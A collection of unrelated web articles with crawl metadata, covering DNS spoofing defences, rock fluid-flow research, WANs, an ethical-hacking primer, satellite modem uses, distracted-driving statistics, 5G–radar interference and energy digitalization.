Multiple experts have been focused on one persistent problem with DNS-based attack, which a large number of organizations tend to take much of their DNS infrastructure for granted. For example, many organizations do not keep a track record of their DNS traffic, nor maintain a history of any changes made to their domain records.
Common tips to prevent DNS Spoofing include maintaining the DNS software up-to-date, maintaining separate servers for public and internal services and using secure keys to sign updates received from other DNS servers to avoid updates from non-trusted sources.Few preventive measures for organizations include:
- Use DNSSEC – DNSSEC, or Domain Name System Security Extensions, uses digitally signed DNS records to help determine data authenticity. DNSSEC is still a work in progress as far as deployment goes, however was implemented in the Internet root level in 2010. An example of a DNS service that fully supports DNSSEC is Google’s Public DNS.
- Using registration features like Registry Lock that help in protecting any unauthorized modifications being performed on domain names records.
- Implementation of access control mechanism for applications, Internet traffic and monitoring.
- Using 2-factor authentication.
- Implementation of unique password policy and Password managers.
- Using Certificate monitors via different mechanisms.
- Implement DNS spoofing detection mechanisms such as XArp .
- Use encrypted data transfer protocols – This type of encryption allows the users to verify whether the server’s digital certificate is valid and belongs to the website’s expected owner.
John Crain, chief security, stability and resiliency officer at ICANN said
“A lot of this comes down to data hygiene. Large organizations down to mom-and-pop entities are not paying attention to some very basic security practices, like multi-factor authentication. These days, if you have a sub-optimal security stance, you’re going to get owned. That’s the reality today. We’re seeing much more sophisticated adversaries now taking actions on the Internet, and if you’re not doing the basic stuff they’re going to hit you.” | <urn:uuid:b8ea33f2-4476-43d9-a360-0cca6c74658c> | CC-MAIN-2022-40 | https://www.lifars.com/2020/07/what-is-dns-spoofing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337473.26/warc/CC-MAIN-20221004023206-20221004053206-00519.warc.gz | en | 0.923422 | 1,377 | 3.359375 | 3 |
Engineers have dispelled a 100-year-old scientific law used to describe how fluid flow through rocks. The discovery leads to a range of improvements including advances in Carbon Capture and Storage (CCS).
Miles below the surface of Earth different types of fluids are flowing through the microscopic spaces between the grains in rocks. Scientists from Imperial college, London, used the Diamond Light Source facility in the UK to make 3D videos that show how fluids move through rock.
Darcy’s Extended Law
Previously, scientists have used a formula for modelling how fluids move through rocks. It’s called Darcy’s Extended Law and the premise of it is that gases move through rock via their own separate, stable, complex, microscopic pathways. This approach used by engineers to model fluid flow for the last 100 years.
However, the Imperial scientists discovered that rather than flowing in a relatively stable pattern through rocks. The pathways that fluid flow through only in a short period of time, tens of seconds at most, before re-arranging and forming into different ones.
Researchers called this process as dynamic connectivity. The importance of the discovery of dynamic connectivity around the world now able to more accurately model how fluids flow through the rock.
Dr. Catriona Reynolds, lead author on the study, said, the model has proven a major scientific and engineering challenge. Our new observations in this study will force engineers to re-evaluate their modelling techniques, increasing their accuracy.
To create the 3D images, the researchers used the synchrotron particle at the Diamond Light Source. The synchrotron enables to take 3D images at speeds much faster than a conventional laboratory X-ray instrument around 45 seconds. This enabled them to see the dynamics, which had not observed previously.
However, an even higher time resolution would significantly enhance the observations. These fluid pathways re-arrange themselves quickly, so ideally the team would like the observations to capture every 100th of a second. This time resolution is only possible right now using optical light from microscopes combined with high-speed cameras. However, they are limited in their ability to observe the fluids moving through real rocks.
More information: [PNAS] | <urn:uuid:424efbf8-a7d8-4fa4-be0b-1a50e9143ceb> | CC-MAIN-2022-40 | https://areflect.com/2017/07/18/engineers-dispelled-a-100-year-old-scientific-law-on-fluid-flow-through-rocks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00519.warc.gz | en | 0.940646 | 455 | 4.125 | 4 |
Do you have a wide area network (WAN) at your company? If you operate globally, you probably do. That’s because WANs are powerful business tools. They make it possible for large organizations to communicate internally faster and more efficiently.
They also make it possible for consumers to enjoy company benefits they couldn’t enjoy in the past.
With all these things going for it, you’d think the WAN would be the next frontier in information technology.
But the state of the Enterprise WAN is mixed—at least according to a State of the Enterprise WAN 2019.
Clearly, WANs have their advantages and disadvantages and aren’t going away anytime soon.
Like every technological tool, you need to use them in the right scenario to benefit from them.
If your company is planning on creating a wide area network to boost global communications, it’s a huge benefit for you to know the advantages and disadvantages of WANs.
What Are Wide Area Networks?
WANs are large communication networks that connect locations over a wide geographical area, including cities, states, countries, and continents.
Enterprise WANs are often built for one organization and are usually private.
Often, they’re created using leased lines involving a direct point-to-point connection between two private sites.
A leased line is a direct connection between two points set up by a telecommunications carrier, like a T-1 channel. And while they resemble Local Area Networks (LANS) a great deal, WANs are structured and operate quite differently.
WANS have been around for a while with some people tracing their roots to the 1970s, 1980s and even the 1990s.
That’s when Frame Relay Service appeared as an alternative to the point-to-point service options then being offered.
This new service offered numerous advantages including lower monthly costs, fewer physical connections to oversee, and less expensive router hardware to manage.
In any case, WANs represented a viable communication option for businesses and remain so today.
WANs Grow and Expand
WAN technology has grown and expanded over the years. New technologies, services, and applications developed during that time, dramatically boosting their impact on business.
Why are they so useful to businesses? Two Reasons:
- WANs let businesses use common resources to operate.
- WANs let businesses share internal functions, like sales, R&D, accounting, and marketing throughout authorized locations through the network.
Those two things boost productivity and communications.
The latest development in this area is software-defined WAN technology (SD-WAN) — a specific application of software-defined networking applied to wide area network connections. The virtualized server and storage structure of the modern data center is an example of software-defined networking. It makes the network more dynamic, manageable, and adaptable For example, a WAN often connects branch offices to a central corporate network or to connect data centers located great distances away. With SD-WAN, more of the network’s controls are moved to the “cloud” using software. That lowers costs, reduces complexity, and increases flexibility. Plus, SD-WANs provide better security.
Advantages of WANS
If your company has branches in several locations, a wide area network is a viable option to boost productivity and increase internal communications. Below are some of the more critical business advantages to establishing a WAN:
Centralizes IT infrastructure
Many consider this WAN’s top advantage. A WAN eliminates the need to buy email or file servers for each office. Instead, you only have to set up one at your head office’s data center. Setting up a WAN also simplifies server management, since you won’t have to support, back up, host, or physically protect several units. Also, setting up a WAN provides significant economies of scale by providing a central pool of IT resources the whole company can tap into.
Boosts your privacy
Setting up a WAN allows you to share sensitive data with all your sites without having to send the information over the Internet. Having your WAN encrypt your data before you send it adds an extra layer of protection for any confidential material you may be transferring. With so many hackers out there just dying to steal sensitive corporate data, a business needs all the protection it can get from network intrusions.
Corporate WANS often use leased lines instead of broadband connections to form the backbone of their networks. Using leased lines offers several pluses for a company, including higher upload speeds than your typical broadband connections. Corporate WANS also generally offer unlimited monthly data transfer limits, so you can use these links as much as you like without boosting costs. Improved communications not only increase efficiency but also boost productivity.
Eliminates Need for ISDN
WANs can cut costs by eliminating the need to rent expensive ISDN circuits for phone calls. Instead, you can have your WAN carry them. If your WAN provider “prioritizes voice traffic,” you probably won’t see any drop off in voice quality, either. You may also benefit from much cheaper call rates when compared to calls made using ISDN circuits. Some companies use a hybrid approach. They have inbound calls come over ISDN and outbound calls go over the WAN. This approach won’t save you as much money, but it will still lower your bill.
Many WAN providers offer business-class support. That means you get a specific amount of uptime monthly, quarterly, or yearly as part of your SLA. They may also offer you round-the-clock support. Guaranteed uptime is a big plus no matter what your industry. Let’s face it. No company can afford to be down for any length of time in today’s business environment given the stringent demands of modern customers.
Cuts costs, increase profits
In addition to eliminating the need for ISDN, WANs can help you cut costs and increase profits in a wide variety of other ways. For example, WANS eliminates or significantly reduces the costs of gathering teams from different offices in one location. Your marketing team in the United States can work closely with your manufacturing team in Germany using video conferencing and email. Saving on the travel costs alone could make investing in a WAN a viable option for you.
WANS also provides some key technical advantages as well. In addition to providing support for a wide variety of applications and a large number of terminals, WANs allow companies to expand their networks through plug-in connections over locations and boost interconnectivity by using gateways, bridges, and routers. Plus, by centralizing network management and monitoring of use and performance, WANS ensures maximum availability and reliability.
Disadvantages of WANS
While WANS provides numerous advantages, they have their share of disadvantages. As with any technology, you need to be aware of these downsides to make an informed decision about WANS. The three most critical downsides are high setup costs, security concerns, and maintenance issues.
High setup costs
WANs are complicated and complex, so they are rather expensive to set up. Obviously, the bigger the WAN, the costlier it is to set up. One reason that the setup costs are high is the need to connect far-flung remote areas. However, by using public networks, you can set up a WAN using just software (SD-WAN), which reduces setup costs. Keep in mind also that the price/performance ratio of WANs is better now than a decade or so ago.
WANs open the way for certain types of internal security breaches, such as unauthorized use, information theft, and malicious damage to files. While many companies have some security in place when it comes to the branches, they deploy the bulk of their security at their data centers to control and manage information sent to their locations. This strategy reduces management costs but limits the company’s ability to deal directly with security breaches at their locations. Some companies also have a hard time compressing and accelerating SSL traffic without significantly increasing security vulnerabilities and creating new management challenges.
Maintaining a WAN is a challenge, no doubt about it. Guaranteeing that your data center will be up and operating 24/7 is the biggest maintenance challenge of all. Datacenter managers must be able to detect failures before they occur and reduce data center downtime as much as possible, regardless of the reasons. Downtime is costly, in fact, a study done by infonetics Research estimates that medium and large businesses in North America lose as much as $100 million annually to IT and communication technology downtime.
Other maintenance concerns include link quality and performance degradation, on-demand throughput, load balancing for the data center, bandwidth management, scalability, and data center consolidation and visualization
As the person responsible for your company’s network requirements, you need to consider both the advantages and disadvantages of this powerful tool to make an informed decision on the viability of a WAN for your company.
WANs are powerful business tools. They boost an organization’s communications, competitiveness, and even profitability. But WANS also have their downsides too, including internal security concerns and significant maintenance challenges. Either way, now you have the facts. | <urn:uuid:7e34249f-314b-4df5-b9f6-a758d5588e12> | CC-MAIN-2022-40 | https://purple.ai/blogs/advantages-disadvantages-wans/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00519.warc.gz | en | 0.949543 | 1,953 | 2.5625 | 3 |
By Luke Willadsen
What is an Exploitation, Anyway?
If we leave it up to Merriam Webster an ‘exploitation’ is “an act of instance of exploiting.” Because that doesn’t quite clear things up, we’ll take it one step further: “to make use of meanly or unfairly for one’s own advantage.” When it comes to cybersecurity, and in keeping things ethical, exploitation is the execution of any method or technique that can be used to accomplish one of the following:
With a working definition that’s more in-line with the intention of this blog, let’s explore how one can ethically exploit something or someone.
Why Do We Exploit?
When it comes to exploitation as it relates to cybersecurity, there are two camps: white hat hackers, or ethical hackers, and malicious actors. Each of these two camps have very different motivations for performing exploitations on a network, system, or person.
White hat hackers conduct penetration tests, or pentests, in which exploitation is performed in order to uncover existing and/ or potential security holes so they can be fixed before malicious actors find them. This is ethical hacking. The ethical hacker conducting the pentest reports on the vulnerabilities they discover, including the path(s) they used to exploit the vulnerabilities, with the sole purpose of empowering the organization to work to resolve them.
Malicious actors, or cyber criminals, attempt to exploit networks, systems, and people with the intent to cause harm. This is non-ethical hacking. The cyber criminals conducting these actions do so to gain access to unauthorized or confidential data and use it against the victim, or to interrupt or disable access to information or systems in hopes of collecting a ransom payment before the victimized organization is able to return to normal business operations.
Penetration Testing: How One Ethically Exploits Something or Someone
Exploitation requires there to be flaws, otherwise known as vulnerabilities. Vulnerabilities can be just about anything, from highly technical flaws (i.e. how a computer program receives and processes tasks, a network protocol that has unused, legacy flags within it that the developers forgot existed, or the way a web application passes requests to its backend database) to human behavior (i.e. that super gullible Dave in Accounting or the security guard that’s a sucker for a nice smile and some donuts).
Individuals conducting pentests have to think outside the box. Once a vulnerability has been identified, and subsequently exploited, the compromised network, system, or person can be leveraged to deliver harm. For example, the aforementioned flaw in a web application may allow for a specially crafted HTTP GET request to be sent that then makes the database spit out all its dirty secrets. Or if a nice, personalized email is sent to Dave he may be inclined to click on the link so that he can save a puppy’s life.
Evolution of Exploitation
In part 2 of this series we explore how vulnerability exploitation has evolved over the early 2010's.
About the Author: Luke Willadsen, Technical Services Lead, EmberSec, is an InfoSec professional and white hat hacker. After getting his start with the Dept. of Defense in 2010, Luke leveraged his specialization in offensive security and eventually turned to private and public sector consulting. Mr. Willadsen has a bachelor’s degree in cybersecurity, a master’s degree in technology studies, an OSCP certification, and a CISSP certification. Outside of his professional life, Luke is a husband, an animal lover, a fitness enthusiast and a passable guitar player, plays a bard in Dungeons and Dragons, and enjoys playing a few rounds of Battlefield on my PS4 a night or two a week.
About EmberSec: EmberSec, a Division of By Light, serves as a provider of advanced, technical cybersecurity services and solutions. Whether that's testing the maturity and efficiency of your security program through technical assessments, integrating highly customized Managed Detection & Response capabilities, or aligning your infrastructure and security practices around industry frameworks, EmberSec understands the complexities involved in establishing a truly secure enterprise.
The EmberSec team is comprised of senior security researchers, operators, and intelligence professionals, and specializes in the following domains: | <urn:uuid:177a6f33-8f7f-4cb8-9404-10803ce9d779> | CC-MAIN-2022-40 | https://www.embercybersecurity.com/blog/blog-series-exploitations-penetration-testing-and-modern-cybersecurity-defenses | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00519.warc.gz | en | 0.91928 | 891 | 3.390625 | 3 |
Autonomous Ground Sensor
NAL Research participated in an unattended ground sensor program by implementing the Iridium data communication solution to meet shortfalls in the relay of time sensitive information. The package includes sensors, an aerodynamic delivery body, a ground-brake subsystem and NAL Research’s Iridium data modem to provide real-time, two-way global communications capability. The modified NAL Research’s Iridium data modems withstood the impact of an air launched at 10,000 feet and continued to relay sensor data after hitting the ground.
NAL Research’s 9601-DGS satellite tracker was used for the first time to monitor a vehicle during the 2006 Tecate SCORE Baja 500 Race down in the Mexico Baja Peninsula. It is inarguably the world’s most intense off-road race known as the “roughest run under the sun.” The 9601-DGS was mounted on a vehicle’s exterior frame and transmitted back real-time location information to a command/control center every ten seconds during the entire grueling 1,000 mile race. The 9601-DGS survived 17 hours of constant pounding over rough and remote terrain.
Light Armor Vehicles
NAL Research’s 9601-DGSM satellite trackers are used to monitor fleets of light armor vehicles by the Department of Defense. They are installed inside each vehicle to relay real-time, encrypted location information to mobile and fixed command and control centers. The tracker can also be removed and used as a personal emergency beacon.
Polar Research Program
The “Tumbleweed Rover”, a NASA’s Jet Propulsion Laboratory (JPL) initiative, “rolled” out of the Amundsen-Scott South Pole Station on January 24, 2004, completing its roll across Antarctica’s polar plateau roughly eight days later. Along the way, the beach-ball-shaped device, roughly six feet in diameter, used the NAL Research’s Iridium data modem with GPS module to send information about its position, the surrounding air temperature, pressure, humidity and light intensity to a JPL ground station. The Tumbleweed’s success was evident throughout its 40-mile, wind-driven trek across Antarctica, despite some of the most trying conditions on planet Earth. The ultra-durable ball reached speeds of 10 miles per hour over the Antarctic ice cap, and traveled at an average speed of about 3.7 miles per hour.
RFID Development Kit
The SAVI Portable Deployment Kits (PDKs) are used across the U.S. Marine Corps to fill gaps in the current fixed RFID Infrastructure as part of the Marine Corps Total Asset/In-Transit Visibility (ITV) effort. The PDK is a mobile checkpoint solution that integrates several automatic identification and data collection (AIDC) technologies, including bar codes, active RFID and NAL Research’s A3LA-DG modem, all in a carrying case that can easily be transported by a single person and powered by a vehicle’s battery. The system collects and processes data from active RFID tags on equipment pallets and containers, then transmits it through the Iridium network to the Department of Defense ITV network server.
Tactical Medical Coordinating System
Tactical Medical Coordinating System (TacMedCS) is an electronic medical management system allowing warfighters to send casualties into a shared database. The casualty information is input into TacMedCS using handheld scanners with an integrated NAL Research’s A3LA modem to read RF enabled dog tags and securely transmit via the Iridium network.
Tactical Meteorological Observing
The Tactical Meteorological Observing System (AN/TMQ-53 TMOS) is a collection of U.S. Air Force weather sensors connected to a NAL Research’s custom-designed A3LA-IU Iridium modem. Its modular design allows deployment as a stand-alone suite of sensors. For the first time, field units have constant, up-to-date weather information to support warfighters. The Iridium-based solution ensures the availability of timely weather observations from any location on Earth. All levels of command can access the weather database through a common network.
Unmanned Ground Vehicle
The DARPA Grand Challenge was a field test designed to stimulate research and development of autonomous ground vehicle technology for future military applications. During the race, each vehicle was required to travel approximately 175 miles over rugged desert terrain using only onboard sensors and navigation equipment to find and follow the route and avoid obstacles. NAL Research equipped each of the vehicles with an Iridium tracker that transmitted its location several times per minute to the host server. This allowed each vehicle’s movements to be monitored as they negotiate the difficult terrain along the route. | <urn:uuid:dcf45918-8644-49e2-b5f9-301c5f7ca5e3> | CC-MAIN-2022-40 | https://www.nalresearch.com/applications/land/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00519.warc.gz | en | 0.899484 | 1,003 | 2.546875 | 3 |
As we've reported in the past, the death toll on US roads keeps increasing despite ever-safer vehicles. And people are overwhelmingly to blame; the National Highway Traffic Safety Administration calculates that 97 percent of all fatal crashes are due to human error. One factor in all this unsafe road behavior is distracted driving, and the past few weeks have seen my inbox bombarded with new studies on the topic. After a while, a deluge like that becomes hard to ignore, so I figured it was time to sit down and read through them. And the findings reveal that drivers aren't really getting any better about focusing on the road.
The various reports use a number of different methodologies: combing through NHTSA's Fatality Analysis Report System (FARS), data collected from smartphone apps, plus surveys of drivers and companies. So taken together, they ought to give us a decent picture of the problem. As we'll see, however, you can infer very different things depending on how you look at the data, particularly when you try to break it down geographically. Let's start with the analyses of NHTSA's crash data.
Safewise looked at FARS data for 2016 (the most recent year with complete data) to investigate the prevalence of distracted driving. It found that nine percent of all road fatalities, and six percent of driver fatalities, were caused by distracted driving and that the total number of deaths had increased by 14 percent in just two years. It then broke things down by state; the deadliest place to drive appears to be Mississippi, with 23.1 deaths per year for every 100,000 people. Alabama and South Carolina also exceeded 20 deaths per 100,000 people. Meanwhile, the District of Columbia is the safest place to drive, with just four deaths per 100,000 people. For context, the national average for the country was 11.6 deaths per 100,000 people.
Distracted driving: More than just cellphones
Looking past just fatal crashes, Safewise calculated that the average incidence of cellphone use causing distracted driving nationally is about 14 percent. It found the practice most prevalent among the youngest drivers (19 percent for 15-19 year olds), followed by those aged 20-29 (18 percent), 40-49 (17 percent), and 30-39 (16 percent). Elderly drivers are the least likely to use a cell phone while driving, with use as low as two percent for those aged 70 and above.
Erie Insurance, also using FARS data, came to the same conclusion about the overall incidence of cellphone use causing distracted driving crashes, adding the fact that 61 percent of distracted driving-related crashes were down to drivers daydreaming.
It's difficult to imagine legislation governing daydreaming while driving. But the past 10 years have seen plenty of legislation focused on preventing cell phone use while on the road. So Safewise looked at how well the states are enforcing laws to prevent cell phone use while driving. Fifteen states and DC have laws banning all cell phone use while driving, and most of the remaining ones at least ban texting while driving. Of these states, Delaware leads the pack in actually enforcing those laws, with 13,061 citations per 100,000 licensed drivers. New York (11,996) and DC (10,952) are the next best. But as you'll see in the infographic, many other states issue few if any tickets for breaking those laws.
Using smartphones to study smartphone use while driving
Drivemode is an Android app designed to adhere to NHTSA safety guidelines for a driving app, with a simplified UI and hands-free talk-to-texting. It only looked at data from its 177,000 users to look at national and state-level trends for messaging while driving. Ignoring received messages, it looked at more than 6.5 million "hands-free" messages sent via the app during 2017. It found that people message and drive most frequently during the afternoon rush hour, peaking at 6.87 messages per user per hour between 5pm and 6pm nationally. New Yorkers were the most frequent texters, with 8.21 messages per hour between 5pm and 6pm.
Next up was EverQuote. It used data from its EverDrive app, which uses the phone's GPS and accelerometers and gyroscopes, as well as noting whether the device screen is on or off, to generate a picture of each user's driving, scoring it from 0-100. In 2017, it collected data from 781 million miles of driving and found that speeding (38 percent) and cellphone use (37 percent) were the two most common unsafe behaviors among drivers. When it broke down the data by driver age, an interesting finding emerged: the very youngest drivers (17 or under) were actually the most cautious when it comes to speeding, even if they're among the worst for using a smartphone behind the wheel. It also found that there were no real gender differences in driving behavior.
When EverQuote looked at the data at a state level, some of the data appears to tell a slightly different story to the FARS data breakdown above. Many of the states with the best driving scores were in the Midwest, with Montana topping the charts: here only 33 percent of drivers used their phones, and only 19 percent of trips involved speeding. Wyoming scored an equally good score of 89.4 overall but with just slightly higher rates of cellphone use (34 percent) and speeding (22 percent).
Meanwhile the northeast corridor leads the nation for crappy driving. Worst of all is Connecticut; residents of this state scored the lowest average at 71.6, with 56 percent of trips involving speeding and 34 percent involving cell phone use. Surprisingly for this DC resident, Maryland drivers only scored fifth-worst overall.
Life360 also offers an iOS or Android app that can measure bad driving, and it, too, delved into its data to look at the problem. It found the most common times for cellphone use when driving was the afternoon rush hour (4pm-6pm) and also found that distracted driving causes other bad driving behaviors; drivers using their phones are four times more likely to speed and 40 percent more likely to have to brake heavily compared to their counterparts paying attention to the task at hand.
Like EverQuote, Life360 also found Midwest drivers to be the least distracted; Wyoming drivers used their phones only once every seven miles. Meanwhile it found New Jersey drivers ranked worst, picking up that phone every 4.7 miles.
Many dangerous drivers think they’re safe
Envista Forensics surveyed 2,000 people who admitted to recent dangerous driving behaviors—being rushed, distracted, aggressive, or intoxicated. Of these, 56 percent didn't actually think distracted driving was dangerous—a rather shocking fact. Among aggressive drivers, 25 percent said they wanted to teach someone else a lesson, 16 percent wanted to get even, and 12 percent wanted to intimidate the other driver. Only 47 percent said it reflected bad judgement upon their part.
But it did find signs of people wanting to do better. Three-quarters of those surveyed said they had tried and succeeded in driving intoxicated less often, 64 percent say they are being rushed and aggressive while driving less often, and 58 percent have tried and succeeded in driving distractedly less often. But 22 percent haven't even tried to be less distracted when driving, suggesting we have a ways to go. Envista also broke down its data geographically, discovering that drivers in the Southeast were most likely to minimize the danger of distracted driving. Meanwhile, those Northeasteners were most worried about being late (and therefore most likely to speed). It also looked at trends by age, finding Boomers most likely to say they can drive safely while intoxicated and Millennials five times more likely to say they can safely multitask while driving.
Even among people who have to drive for work, there's plenty of poor behavior out on the roads. Motus spoke to businesses about driving behavior and found that the cost to employers for vehicle crashes has risen from $47.4 billion in 2013 to $56.7 billion in 2017. And 68 percent of businesses have reported recent on-the-job crashes in company-owned vehicles, but only 42.6 percent of businesses are mandating driver safety programs before they let employees drive work vehicles. The data for on-the-job crashes involving employee-owned vehicles was 41 percent, with even fewer (19.5 percent) mandating driver safety programs.
All in all, the reports above paint a relatively bleak picture of our attitudes toward safe driving. As ever, the best advice if you're going to be behind the wheel is to put your phone in Do Not Disturb mode and place it out of sight in a cubby. | <urn:uuid:142a7545-cf20-4f3e-8c36-1074bc4331a9> | CC-MAIN-2022-40 | https://arstechnica.com/cars/2018/05/put-the-phone-down-new-studies-show-were-still-bad-at-distracted-driving/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00719.warc.gz | en | 0.970553 | 1,781 | 2.703125 | 3 |
Like many industries, the US Department of Defense understands how 5G really is. This is a direct result of its high performance, support for security requirements and ability to assist data-driven applications and M2M communications. The DOD is the largest user of the federal spectrum in the US and works with NTIA and FCC to develop policies to enable the spectrum to support emerging technologies. They recognize that technology advances will drive spectrum uptake and, as a result, they need to ensure that they protect access to this vital resource for future military capabilities. As an early 5G adopter, the DoD is hosting a series of experiments and demos as a testbed for potential uses. They need to understand the mitigations required to operate at given frequencies and within given constraints.
One aspect is this work is underway at Hill Air Force Base (AFB). At Hill Air, the Air Force is evaluating the impact of 5G systems on airborne radars, and vice versa, in the mid-band spectrum. The aim is to develop techniques to use spectrum dynamically and enable radars and 5G systems to coexist. The DoD evaluates how 5G wireless networks and high-power radars can function in the same or adjacent spectrum bands. To understand this, the DoD is operating testbeds to understand the dynamics of 5G and radars and the potential interference between the systems. Based on interference measurements and analyses from this testbed, dynamic spectrum utilization technologies are being developed and evaluated. DoD will extend and enhance these findings to optimize spectrum use across a full range of military operational needs.
A similar coordination study is underway in the UK. The national regulator Ofcom, specifies the thresholds and coordination procedure to protect existing radars in the 2.7GHHz band from harmful interference from deployments in the 3.4 GHz.
Notably, in an earlier award in the 2.6GHz band, the UK Government implemented a radar remediation program to ensure ATC radars in the 2.7GHZ band were modified to be more resilient to interference from the 3.4GHz band. However, with over 50 protected military radars and 38 civil radars potentially impacted by the 3.4GHz deployments, Ofcom has outlined a series of thresholds to be met before deployment. The protected thresholds cannot be exceeded in any pointing direction of the protected radar antenna, and field strengths must not exceed the threshold limits for OOB emissions. Ofcom specified the propagation model ITU-R P.452-16 to predict signal levels for a given percentage of time using 50m DTM and clutter. This propagation model calculates the communications signal and the out of band noise at the relevant Protected Radar location(s). MNOs need to confirm that threshold(s) have been met, then deployment can proceed.
During their 5G network rollout, a leading MNO noted that some of their 5G towers fell within the 7km distance from an ATC radar. These radars typically operated at 2.7-3.10GHz while the 5G network operated at 3580-36080 MHz band. Due to the close proximity of the two systems, it was expected that the 5G transmission could interact with the nearby radar and compromise security. The studies focused primarily on 20MHz of spectrum for 5G transmission, due to a partial overlap.
To comply with Ofcom's regulations, a methodology was applied to support calculations. Broadly, this included:
Sites that failed the Ofcom criteria were then processed to identify potential mitigation measures. These included replacing the omni (peak-gain) antenna with a beamforming antenna pattern, reducing the bandwidth of the offending sectors, and de-activating the offending sector. Notably, sectors that failed to meet the OOB noise limit can only be de-activated. Whereas sectors that only fail the in-band criteria can be mitigated by retracting the transmission bandwidth to 3600-3680 MHz.
Radars play a critical role in national security, air traffic control, weather warnings, and other safety of life applications. Typical characteristics of radars like high transmitter peak powers, or sensitive designs of receivers, have resulted in exclusive or primary spectrum allocations for radar operations in selected bands. However, with the demand for radio spectrum growing, significant chunks of the spectrum have been reallocated for emerging technologies that could impact the successful operation of radars. Focus has turned to the military applications which come under threat. These support vital air defence systems used to target detection, recognition and weapon control. Protecting these valuable resources is essential and requires a good understanding of radio propagation, interference analysis and mitigation techniques.
To support this high level of radio propagation modelling, military and civil operators turn to spectrum engineering tools to calculate the impact and identify mitigations.
ATDI supply frequency assignment and spectrum management solutions to defence and security organisations. These solutions exploit spectrum-dependent systems, including communications links, electronic warfare sensors, radio jammers and radars.
Catch up with our latest webinar on Managing 5G interference into ATC Radars | <urn:uuid:073e7809-9c74-40b7-8486-04db0b4662f0> | CC-MAIN-2022-40 | https://atdi.com/protecting-military-radars-from-5g-interference/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335286.15/warc/CC-MAIN-20220928212030-20220929002030-00719.warc.gz | en | 0.932834 | 1,037 | 2.65625 | 3 |
Technology has been increasingly adopted by all major industry sectors over the last several years—and the energy industry is no exception. The energy sector has been an early adopter of digital technologies. In the 1970s, power utilities were digital pioneers, using emerging technologies to facilitate grid management and operation. Years ago, companies started by switching the use of analog meters to digital meters, smart meters, etc., in order to improve energy efficiency. Oil and gas companies have long used digital technologies to improve decision-making for exploration and production assets, including reservoirs and pipelines.
The demand for energy is increasing rapidly. The energy sector is now in a great transition towards a very important energy transformation, and digitalization is one of the key facilitators to ensure that it is fulfilled.
Digitalization acts as a lever in the sector to combat climate change and optimize power generation processes to reduce emissions and meet the objective of decarbonization of the energy model. Industry 4.0 is a notion that is known well in the world of manufacturing. This “fourth industrial revolution” incorporates automation and data that is used for the optimization of production, enhanced flexibility, and efficiency within a smart factory environment. The digital revolution—referred to as Energy 4.0—involves advance tech such as IoT, digital twin, etc., to build smart grids, manage renewable energy, and distributed generation. The global IoT market is expected to reach a value of USD 1,386.06 billion by 2026 from USD 761.4 billion in 2020 at a CAGR of 10.53%, during the forecast period (2021-2026).
In mining, oil, and gas industries, IoT solutions incorporate machines and data analysis to achieve the requirements to operational efficiency, set forth by energy businesses. Actionable data helps to improve decision-making, reduce vulnerabilities and risk factors. New IoT trends in manufacturing have emerged in the last 6 years. Drones and IoT sensors are used to inspect facilities and lines. Smart grid meters provide up-to-the-minute data regarding the demand for oil, gas, water, and electricity. IoT devices also can monitor changes in temperature, moisture, and vibrations, making it possible to prevent equipment failures and increase human safety. By deploying IoT technologies, smart cities are intended to increase the quality of life while lowering energy consumption. Businesses, policymakers, and entrepreneurs in cities will work together to see that urban areas play their part in the energy revolution.
Digital twin technology ranks among the top strategic trends and has been adopted by an ever-widening range of industries since its original development by NASA. A digital twin is an advanced duplicate that models a real-life object or process without replacing it. The digital twin, by using information gathered from IoT systems attached to its physical twin, allows an organization to monitor KPIs. The goal is to feed the data into machine learning systems that can then alert operators to potential issues, expects costs, and the advantages of available options for fixing the situation.
Digital twins can be used to replicate the physical and operational characteristics of a power generation plant or another utility asset prior to construction and also to help improve operations and maintenance over the useful life of the physical installation. As of now, with costs decreasing and technologies growing at an exponential pace, digitalization presents opportunities for Energy 4.0 companies to establish new business models and sustainable strategies for producing and delivering energy. Digitalization can facilitate positive change, but only if policymakers undertake efforts to understand, channel, and harness digitalization’s impacts and minimize its risks.
While there is no simple roadmap to show how an increasingly digitalized energy world will look in the future, the IEA recommends ten no-regrets policy actions that governments can take to prepare. It is hoped it will foster further discussion among governments, companies, and other stakeholders.
- Build digital expertise within their staff
- Ensure appropriate access to timely, robust, and verifiable data
- Build flexibility into policies to accommodate new technologies and developments
- Experiment, including through “learning by doing” pilot projects
- Participate in broader inter-agency discussions on digitalization
- Focus on the broader, overall system benefits
- Monitor the energy impacts of digitalization on overall energy demand
- Incorporate digital resilience by design into research, development, and product manufacturing
- Provide a level playing field to allow a variety of companies to compete and serve consumers better
- Learn from others, including both positive case studies as well as more cautionary tales
The world has begun to shift towards renewable resources, a trend where digital can be of great service in monitoring and delivering optimal outcomes. A well-planned digital transformation in the renewable energy sector will provide numerous benefits:
- Digitalization tools and platforms help build renewable energy plants with automated processes, for informed decision making. In addition, the interconnections they propose are the basis for a more decentralized generation, thus avoiding isolated ‘energy islands.’
- These platforms reduce downtime by offering alerts based on predictive maintenance, anticipating asset maintenance. The modernization of production plants is necessary to make them more efficient.
- They allow a more accurate forecast of the weather and market conditions, which helps to maximize renewable production, by offering a deep analysis of all information received in real-time, to be able to make decisions and offer stability in demand.
- The use of artificial intelligence and machine learning to optimize the engineering and construction of new renewable sources and plants reduces time to market, anticipating the benefits of free C02 generation and increasing production.
- The use of digital tools will allow increasing the productivity of employees, making maintenance much more efficient. The digital transformation in the renewables sector allows automating different work processes, such as the control of photovoltaic and wind farms remotely.
The level of digitalization of the electrical industry is already very high, more than 10 years ago that the production has incorporated it, for example, the automation of hydroelectric power plants and wind farms, everything is done from the control centers, and has a direct consequence in employment and efficiency. But not only the Digital transformation influence on production and maintenance processes. It also influences the relationships with customers.
